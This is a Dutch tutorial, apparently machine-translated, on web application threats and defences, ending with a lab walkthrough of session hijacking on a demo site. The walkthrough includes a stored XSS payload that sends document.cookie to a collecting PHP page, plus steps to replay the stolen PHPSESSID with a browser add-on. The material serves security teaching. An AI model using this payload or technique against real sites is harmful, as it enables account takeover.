meer mensen hebben toegang tot het internet dan ooit tevoren. Dit heeft veel organisaties gevraagd om web-based applicaties te ontwikkelen die gebruikers online kunnen gebruiken om te communiceren met de organisatie. Slecht geschreven code voor webapplicaties kan worden benut om ongeautoriseerde toegang tot gevoelige gegevens en webservers te krijgen.

In deze tutorial leert u hoe u websites kunt hacken, en we zullen u kennis laten maken met hacktechnieken voor webapplicaties en de tegenmaatregelen die u kunt nemen om te beschermen tegen dergelijke aanvallen.

onderwerpen behandeld in deze tutorial

• Wat is een webtoepassing? Wat zijn webbedreigingen?
• hoe uw Website te beschermen tegen hacks?
• website hacking tricks: Hack een Website online!

Wat is een webtoepassing? Wat zijn webbedreigingen?

een webtoepassing (ook wel website genoemd) is een toepassing gebaseerd op het client-server model. De server biedt de toegang tot de database en de business logic. Het wordt gehost op een webserver. De client applicatie draait op de client webbrowser. Webtoepassingen worden meestal geschreven in talen zoals Java, C#, en VB.Net, PHP, ColdFusion Markup Language, enz. de database engines gebruikt in webapplicaties zijn MySQL, MS SQL Server, PostgreSQL, SQLite, enz.

De meeste webapplicaties worden gehost op openbare servers die toegankelijk zijn via het Internet. Dit maakt hen kwetsbaar voor aanvallen als gevolg van gemakkelijke toegankelijkheid. De volgende zijn gemeenschappelijke webapplicatie bedreigingen.

• SQL injectie-het doel van deze bedreiging zou kunnen zijn om login algoritmen te omzeilen, de data te saboteren, enz.
• Denial of Service Attacks-het doel van deze dreiging zou kunnen zijn om legitieme gebruikers toegang te ontzeggen tot de bron
• Cross Site Scripting XSS– het doel van deze dreiging zou kunnen zijn om code te injecteren die kan worden uitgevoerd in de client side browser.
• Cookie / Session Poisoning-het doel van deze bedreiging is om cookies/sessiegegevens door een aanvaller aan te passen om ongeautoriseerde toegang te krijgen.
• form knoeien-het doel van deze bedreiging is om formuliergegevens zoals prijzen in e-commerce applicaties te wijzigen, zodat de aanvaller items tegen gereduceerde prijzen kan krijgen.
• Code injectie-het doel van deze bedreiging is om code zoals PHP, Python, enz.te injecteren. dat kan worden uitgevoerd op de server. De code kan backdoors installeren, onthullen gevoelige informatie, enz.
• Defacement-het doel van deze bedreiging is om de pagina die wordt weergegeven op een website te wijzigen en alle paginaaanvragen om te leiden naar een enkele pagina die het bericht van de aanvaller bevat.

hoe beschermt u uw Website tegen hacks?

een organisatie kan het volgende beleid hanteren om zichzelf te beschermen tegen aanvallen van webservers.

• SQL-injectie-het reinigen en valideren van gebruikersparameters voordat ze naar de database worden gestuurd voor verwerking, kan helpen de kans op aanvallen via SQL-injectie te verminderen. Database engines zoals MS SQL Server, MySQL, enz. ondersteuning parameters, en voorbereide verklaringen. Ze zijn veel veiliger dan traditionele SQL – statements
• Denial of Service-aanvallen-firewalls kunnen worden gebruikt om verkeer van verdacht IP-adres te laten vallen als de aanval een eenvoudig DoS is. Een goede configuratie van netwerken en Intrusion Detection systeem kan ook helpen bij het verminderen van de kans dat een DoS aanval succesvol is geweest.
• Cross Site Scripting-valideren en ontsmetten headers, parameters doorgegeven via de URL, vorm parameters en verborgen waarden kunnen helpen XSS aanvallen te verminderen.
• Cookie / Session vergiftiging-dit kan worden voorkomen door de inhoud van de cookies te versleutelen, de cookies na enige tijd uit te schakelen, de cookies te koppelen aan het IP-adres van de client dat werd gebruikt om ze aan te maken.
• form temping-dit kan worden voorkomen door de invoer van de gebruiker te valideren en te verifiëren voordat deze wordt verwerkt.
• Code-injectie-dit kan worden voorkomen door alle parameters te behandelen als data in plaats van uitvoerbare code. Ontsmetting en validatie kan worden gebruikt om dit te implementeren.
• Defacement – een goed beveiligingsbeleid voor de ontwikkeling van webapplicaties moet ervoor zorgen dat het de vaak gebruikte kwetsbaarheden verzegelt om toegang te krijgen tot de webserver. Dit kan een goede configuratie zijn van het besturingssysteem, webserversoftware en beste beveiligingspraktijken bij het ontwikkelen van webapplicaties.

website hacking tricks: Hack een Website online

In deze website hacking practical scenario, gaan we de gebruikerssessie van de webapplicatie te kapen www.techpanda.org. We zullen cross site scripting gebruiken om de cookie Sessie-id te lezen en deze vervolgens gebruiken om een legitieme gebruikerssessie na te doen.

de aanname is dat de aanvaller toegang heeft tot de webapplicatie en dat hij de sessies van andere gebruikers die dezelfde applicatie gebruiken wil kapen. Het doel van deze aanval zou kunnen zijn om admin toegang te krijgen tot de webapplicatie ervan uitgaande dat de Access account van de aanvaller is een beperkt.

aan de slag

• Open http://www.techpanda.org/
• voor praktijkdoeleinden wordt het ten zeerste aanbevolen om toegang te krijgen met SQL-injectie. Raadpleeg dit artikel voor meer informatie over hoe dat te doen.
• de login e-mail is dit e-mailadres wordt beveiligd tegen spambots. JavaScript moet ingeschakeld zijn om het te bekijken., het wachtwoord is Password2010
• Als u succesvol bent ingelogd, dan krijgt u het volgende dashboard

• klik op Nieuw Contact toevoegen
• voer het volgende in als de voornaam

<a href=# onclick=\”document.location = \ ‘http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\ “>Dark</a>

hier gebruikt

de bovenstaande code JavaScript. Het voegt een hyperlink met een onclick-gebeurtenis. Wanneer de nietsvermoedende gebruiker op de link klikt, haalt de gebeurtenis de PHP cookie Sessie-ID op en stuurt deze naar de snatch_sess_id.php pagina samen met de sessie id in de URL

• Voer de overige gegevens zoals hieronder weergegeven
• Klik op Wijzigingen Opslaan

• Uw dashboard ziet er nu uit als het volgende scherm

• Sinds de cross-site script-code wordt opgeslagen in de database, het zal worden geladen elke keer dat de gebruikers met toegangsrechten login
• stel dat de beheerder inlogt en klikt op de hyperlink met Dark
• hij/zij krijgt het venster met de sessie-id in de URL

opmerking: het script kan de waarde naar een externe server sturen waar de PHPSESSID wordt opgeslagen dan de gebruiker omgeleid terug naar de website alsof er niets gebeurd.

opmerking: de waarde die u krijgt kan verschillen van die in deze webpagina hacking tutorial, maar het concept is hetzelfde

sessie Imitatie met behulp van Firefox en Tamper Data add-on

Het stroomdiagram hieronder toont de stappen die u moet nemen om deze oefening te voltooien.

• U moet Firefox web browser voor deze sectie en de Sabotage van Gegevens add-on
• Open Firefox en installeer de add zoals weergegeven in de diagrammen hieronder

• Zoeken voor sabotage van gegevens klik dan op installeren zoals hierboven weergegeven

• Klik op Accepteren en Installeren…

• Klik op nu Opnieuw opstarten wanneer de installatie is voltooid
• Activeer de menubalk in Firefox als het niet wordt weergegeven

• Klik op het menu extra en selecteer vervolgens Tamper Data, zoals hieronder weergegeven

• u krijgt het volgende venster. Opmerking: als de Vensters niet leeg zijn, druk dan op de knop Wissen

• klik op Start Tamper menu
• schakel terug naar Firefox webbrowser, typ http://www.techpanda.org/dashboard.php druk vervolgens op de enter toets om de pagina te laden
• u krijgt de volgende pop – up van Tamper Data

• het pop-up venster heeft drie (3) opties. Met de sabotage optie kunt u de HTTP header informatie wijzigen voordat deze naar de server wordt verzonden.
• Klik erop
• u krijgt het volgende venster

• kopieer de PHP sessie ID die u hebt gekopieerd van de attack URL en plak het na het gelijkteken. Uw waarde ziet er nu zo uit

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

• klik op OK button
• u krijgt het pop-upvenster voor Sabotagegegevens opnieuw

• schakel het selectievakje uit dat vraagt doorgaan met knoeien?
• klik op de knop Verzenden als u klaar bent
• u zou het dashboard moeten kunnen zien zoals hieronder getoond

Note: we hebben niet ingelogd, we imiteerden een aanmeldsessie met behulp van de PHPSESSID-waarde die we hebben opgehaald met behulp van cross site scripting

samenvatting

• een webtoepassing is gebaseerd op het server-client-model. De clientzijde gebruikt de webbrowser om toegang te krijgen tot de bronnen op de server.
• webtoepassingen zijn meestal toegankelijk via internet. Dit maakt hen kwetsbaar voor aanvallen.
• bedreigingen voor webtoepassingen omvatten SQL-injectie, Code-injectie, XSS, Defacement, Cookie vergiftiging, enz.
• Een goed beveiligingsbeleid bij het ontwikkelen van webapplicaties kan helpen om ze veilig te maken.